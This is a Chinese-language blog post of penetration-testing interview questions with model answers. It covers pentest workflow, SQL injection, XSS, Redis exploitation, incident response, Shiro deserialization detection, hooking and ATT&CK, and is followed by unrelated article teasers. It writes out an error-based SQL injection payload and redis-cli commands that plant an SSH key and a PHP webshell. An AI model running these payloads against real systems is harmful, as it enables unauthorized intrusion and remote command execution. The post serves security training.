2025年滲透測試面試題總結-71(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

2. 滲透測試流程 & 內網滲透經驗

3. SQL注入報錯利用

4. XSS利用(反射型/DOM型)

5. Redis未授權利用

6. 應急響應流程(無安全設備場景)

7. 手動檢測Shiro反序列化漏洞

8. 漏洞研究與開發能力

9. Hook技術理解

10. ATT&CK框架應用深度

2、滲透測試流程,有沒有打過內網
3、SQL注入,報錯
4、XSS,反射/DOM型,怎么利用
5、Redis的利用
6、應急響應能力怎么樣,處置流程思路
7、無態勢感知,安全設備,怎樣手動發現shiro反序列化漏洞進來都攻擊
8、平時有分析研究漏洞嗎,編寫exp,熟悉什么開發語言
9、關于hook了解
10、ATT&CK框架了解嗎、到什么程度,是否有過應用

2. 滲透測試流程 & 內網滲透經驗

滲透測試標準流程 (PTES框架精簡版):

  1. 情報收集:資產探測(域名/端口/服務)、員工信息、供應鏈漏洞
  2. 威脅建模:確定高價值目標(數據庫、域控)、繪制攻擊路徑
  3. 漏洞分析:自動化掃描 + 手動驗證(避免誤報)
  4. 滲透利用:獲取初始立足點 → 權限提升 → 橫向移動
  5. 后滲透:敏感數據定位、權限維持(后門/黃金票據)、痕跡清理
  6. 報告輸出:風險評級、漏洞復現步驟、修復方案

內網滲透實戰要點:

  • ?? 打點案例:通過Web應用漏洞(如Spring Boot Actuator未授權)進入內網
  • ?? 橫向移動
    • 協議利用:NTLM Relay攻擊、SMB爆破/MS17-010
    • 憑據竊取:Mimikatz提取密碼、Kerberoasting攻擊SPN賬戶
  • ?? 域控突破:利用AD組策略漏洞(GPP密碼解密)、ZeroLogon (CVE-2020-1472)
  • ?? 隱蔽隧道:DNS/ICMP隧道繞過網絡監控,使用Chisel進行端口轉發

3. SQL注入報錯利用

報錯注入核心原理:觸發數據庫強制報錯,使錯誤信息包含查詢結果
經典Payload示例

sql' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--

關鍵利用場景

  • 數據庫版本識別:@@version
  • 數據提取:CONCAT((SELECT user()),0x3a,...)
  • 文件讀取:LOAD_FILE('/etc/passwd')(需FILE權限)
  • OOB外帶數據:結合DNS查詢(如Oracle的UTL_HTTP)

4. XSS利用(反射型/DOM型)

類型利用場景實戰案例
反射型釣魚攻擊、Cookie劫持偽造登錄頁誘導用戶提交憑證
DOM型前端框架漏洞(如AngularJS沙箱逃逸)修改客戶端代碼繞過安全檢測
高級利用技巧
  • CORS繞過:利用信任域發起跨域請求竊取數據
  • 結合CSRF:觸發敏感操作(如修改密碼)
  • 瀏覽器漏洞:配合BeEF框架利用瀏覽器0day(如CVE-2023-3079)

5. Redis未授權利用

四大攻擊路徑

  1. 寫入SSH公鑰
    bashredis-cli -h 目標IP flushall redis-cli -h 目標IP set payload "公鑰內容" redis-cli -h 目標IP config set dir /root/.ssh/ redis-cli -h 目標IP config set dbfilename authorized_keys 
  2. Webshell寫入
    redisconfig set dir /var/www/html config set dbfilename shell.php set x "<?php system($_GET['cmd']);?>" save 
  3. 主從復制RCE:利用模塊如RedisRogue
  4. Crontab定時任務:寫入反彈Shell腳本

6. 應急響應流程(無安全設備場景)

處置四步法

  1. 快速隔離
    • 拔網線 > 防火墻阻斷 > 關機(權衡業務影響)
  2. 痕跡固定
    • 內存鏡像(Volatility)
    • 磁盤快照(dd / FTK Imager)
  3. 入侵溯源
    • 重點檢查:計劃任務、啟動項、異常進程(ps -aux | grep可疑名
    • 日志分析:
      bashgrep -E 'Accepted|Failed' /var/log/auth.log # SSH登錄審計 journalctl -u sshd --since "2 hours ago" # 時間范圍檢索 
  4. 恢復加固
    • 重置所有憑證(包括服務賬戶)
    • 修補漏洞(參考MITRE CVE數據庫)

7. 手動檢測Shiro反序列化漏洞

無設備條件下的三步排查法

  1. 特征識別
    • 檢查Cookie中是否存在rememberMe=deleteMe
    • 觀察HTTP響應頭中的Set-Cookie: rememberMe=...
  2. 密鑰爆破
    • 使用工具ShiroAttack2 爆破常見密鑰(kPH+bIxk5D2deZiIxcaaaA==)
  3. 流量分析
    • Wireshark過濾特征:TCP contains "rememberMe"
    • 檢測異常Java序列化流頭:aced 0005(Hex)

8. 漏洞研究與開發能力

  • 研究方向:重點跟蹤Java生態漏洞(Spring/Log4j2)、云原生漏洞(K8s提權)
  • EXP開發
    • 語言:Python(POC框架)、Go(高并發利用)、Java(內存馬注入)
    • 案例:曾復現Apache Dubbo CVE-2023-23638并編寫RCE利用腳本
  • 工具貢獻:提交PR修復Sqlmap中Shiro密鑰檢測模塊的誤報問題

9. Hook技術理解

安全領域的Hook應用

類型實現方式防御對抗用途
用戶態Detours(Windows API劫持)監控敏感API調用(如WriteProcessMemory)
內核態SSDT Hook(Windows)隱藏進程/端口
瀏覽器Chrome擴展(manifest V3)檢測惡意JS執行鏈
實戰案例
  • 使用Frida框架Hook Android應用SSL證書驗證函數繞過雙向認證

10. ATT&CK框架應用深度

掌握程度

  • 矩陣映射:在報告中標注攻擊技術ID(如T1059.004 - PowerShell)
  • 戰術應用
    • 紅隊:基于TA0008(橫向移動)設計域滲透路徑
    • 藍隊:針對T1547.001(注冊表自啟動)部署EDR檢測規則
      項目實踐
  1. 利用ATT&CK Navigator設計企業威脅覆蓋熱力圖
  2. 將蜜罐捕獲的攻擊行為映射到TTPs(如APT29常用T1078.004 - 云賬戶)
  3. 開發自動化工具關聯Sigma規則與ATT&CK技術編號

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/97716.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/97716.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/97716.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

基于Echarts+HTML5可視化數據大屏展示-茶園大數據平臺指揮艙

效果展示&#xff1a;代碼結構&#xff1a;主要代碼實現 index.html布局 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0&quo…

華為網路設備學習-33(BGP協議 八)BGP路由 選路規則

一、目標與背景BGP路由特性&#xff1a;支持豐富的路徑屬性選路規則多樣注&#xff1a;在BGP路由表中最優選&#xff0c;不一定是路由表中的最優選。有可能存在靜態路由或者ospf路由等&#xff0c;其優先級高于BGP路由。二、選路規則概述從1到12&#xff0c;依次對比優先級。一…

深度學習(七):梯度下降

梯度下降&#xff08;Gradient Descent&#xff09;是深度學習中最核心的優化方法之一&#xff0c;它通過迭代更新模型參數&#xff0c;使得損失函數達到最小值&#xff0c;從而訓練出性能良好的神經網絡模型。 基礎原理 損失函數 在深度學習中&#xff0c;損失函數 L(θ) 是衡…

常見巖性分類與油氣勘探意義筆記

常見巖性分類與油氣勘探意義筆記 相關科普視頻可查看【說說巖石的分類-嗶哩嗶哩】 一、巖石基本分類體系 根據成因&#xff0c;自然界巖石可分為三大類&#xff0c;其中沉積巖與油氣勘探關系最為密切&#xff1a; 1. 火成巖&#xff08;巖漿巖&#xff09; 由巖漿冷卻凝固…

【Kubernetes】Tomcat 啟用 Prometheus 監控指標

之前出過一篇文章關于 “自定義監控指標實現業務 HPA 伸縮” &#xff0c;其中使用了 webapp 應用的指標數據&#xff08;JVM&#xff09;&#xff0c;接下來&#xff0c;這篇文章將介紹如何在通過 Tomcat 部署的 webapp 中啟用 Metrics 指標&#xff0c;一起來看看吧&#xf…

JVM 三色標記算法詳解!

目錄1. 什么是三色標記算法&#xff1f;三種顏色及其含義&#xff1a;2. 基礎三色標記算法流程 (非并發)3. 并發場景下的挑戰&#xff1a;一致性問題3.1. 漏標 (Missing Live Object) - 最嚴重的問題3.2. 錯標 (Floating Garbage) - 不那么嚴重的問題4. 屏障機制 (Barrier) - 解…

優化神經網絡模型以提升R2值至0.99的全面方案

優化神經網絡模型以提升R值至0.99的全面方案 1. 問題分析與背景 在深度學習項目中&#xff0c;提升模型的R&#xff08;決定系數&#xff09;值至0.99是一個具有挑戰性的目標&#xff0c;特別是在處理復雜的時間序列數據時。我們的現有模型結合了LSTM層、自注意力機制和MLP處理…

pgNow:一款免費的PostgreSQL監控與性能診斷工具

pgNow 是一款免費的桌面工具&#xff0c;可以為 PostgreSQL 數據庫提供快速集中的監控與性能診斷。 pgNow 不依賴代理&#xff0c;無需任何配置&#xff0c;可以幫助開發者或數據庫管理員&#xff08;DBA&#xff09;直觀地查看數據庫的統計信息和關鍵性能指標。 功能特性 跨平…

深入理解棧與隊列——從原理理解到實戰應用

目錄 一、引言 二、棧&#xff08;Stack&#xff09; 2.1 棧的基本概念 2.2 棧的使用 2.3 棧的模擬實現 2.4 棧的實戰應用 2.4.1 括號匹配 2.4.2 逆波蘭表達式求值 2.4.3 出棧入棧次序匹配 2.4.4 最小棧 三、隊列&#xff08;Queue&#xff09; 3.1 隊列的基本概念 …

用html5寫王者榮耀之王者墳墓的游戲2deepseek版

我將為您創建一個王者榮耀英雄墳墓游戲的提詞器HTML頁面。這個工具將幫助游戲主播或玩家在游戲中快速查看英雄技能、連招順序等信息。設計思路 創建英雄選擇界面實現提詞器顯示區域&#xff0c;可自定義文本內容添加字體大小、滾動速度控制設計符合王者榮耀風格的UI下面是…

輕閱讀:一鍵解決瀏覽器無法預覽Office文檔的實用方案

在日常辦公中&#xff0c;通過瀏覽器直接打開Word、Excel或PPT等文檔時&#xff0c;常遇到“需下載后用本地軟件打開”的困擾&#xff0c;不僅流程繁瑣&#xff0c;還面臨格式兼容、設備存儲不足等問題。輕閱讀&#xff08;QingYueDu&#xff09;作為一款輕量級文件在線預覽工具…

鴻蒙開發實戰項目(六十七):常見組件和容器低代碼開發示例(ArkTS)

本文詳細代碼需訂閱下面專欄獲取(訂閱后私信郵箱+項目名): https://blog.csdn.net/m0_68036862/category_12333038.html 目錄 介紹 環境搭建 代碼結構解讀 創建低代碼工程 低代碼設計界面布局 實現數據動態渲染 手動創建低代碼頁面 介紹 本篇Codelab是基于ArkTS語言的…

MySQL學習筆記04-DML-數據的增刪改

新增數據--insert樣例代碼-- DML : 數據操作語言 -- DML : 插入數據 - insert -- 1. 為 emp 表的 username, password, name, gender, phone 字段插入值 insert into emp (username,password,name,gender,phone) values(fei,123456,張飛,1,13888888888);-- 2. 為 emp 表的 所有…

拼多多返利app的服務網格(Service Mesh)實踐:Istio在導購系統中的應用

拼多多返利app的服務網格&#xff08;Service Mesh&#xff09;實踐&#xff1a;Istio在導購系統中的應用 大家好&#xff0c;我是阿可&#xff0c;微賺淘客系統及省賺客APP創始人&#xff0c;是個冬天不穿秋褲&#xff0c;天冷也要風度的程序猿&#xff01; 在拼多多返利app的…

【RabbitMQ】高級特性:持久性·發送方確認·重試機制·TTL·死信隊列·延遲隊列·事務·消息分發

RabbitMQ的高級特性還包括我的上篇博客 【RabbitMQ】-----詳解RabbitMQ高級特性之消息確認機制-CSDN博客 目錄 RabbitMQ高級特性之持久性 持久性 交換機持久化 隊列持久化消息持久化 RabbitMQ高級特性之發送方確認機制 發送方確認 添加配置 常量類 聲明隊列和交換機…

鴻蒙Next ArkWeb網頁多媒體開發實戰:從基礎到高級應用

解鎖鴻蒙ArkWeb的強大多媒體能力&#xff0c;讓網頁視頻音頻體驗媲美原生應用在日常應用開發中&#xff0c;我們經常需要在應用中嵌入網頁并展示其中的多媒體內容。鴻蒙HarmonyOS Next的ArkWeb組件提供了強大的網頁渲染能力&#xff0c;尤其對網頁中的多媒體元素有出色的支持。…

06. Linux進程概念 1

Linux進程概念 馮諾依曼體系 馮諾依曼體系結構&#xff08;Von Neumann Architecture&#xff09;是現代計算機設計的奠基石&#xff0c;由數學家約翰馮諾依曼于1945年提出。這一架構徹底改變了早期計算機“硬件即程序”的設計方式&#xff0c;使得計算機可以靈活地運行不同程序…

HTTP標頭全解析:保護你的Web應用!

在網絡攻擊頻發的時代&#xff0c;你的Web應用是否像一座沒有城墻的城堡&#xff0c;任由XSS、點擊劫持和中間人攻擊入侵&#xff1f;HTTP標頭&#xff0c;這些看似不起眼的響應頭&#xff0c;其實是Web安全的隱形守護者。想象一個電商網站&#xff0c;用戶數據被竊取&#xff…

rt-linux下__slab_alloc里的另外一處可能睡眠的邏輯

一、背景 在之前的博客 tasklet上下文內存分配觸發might_alloc檢查及同步回收調用鏈 里&#xff0c;我們講了一處內存分配時會引起睡眠的調用鏈&#xff08;這個引起睡眠的這個調用鏈它是在普通linux里也是存在的&#xff09;。這篇博客里&#xff0c;我們講一處內存分配路徑下…

基于STM32F103C8T6的智能環境監測系統:DHT11溫濕度檢測與OLED顯示實現

引言 你是否曾想實時握身邊環境的溫濕度變化&#xff1f;無論是居家種植需要精準調控環境&#xff0c;還是實驗室存放敏感材料需監控條件&#xff0c;亦或是智能座艙場景下的環境感知&#xff0c;智能環境監測系統正成為連接物理世界與數字管理的重要橋梁。而在眾多嵌入式開發…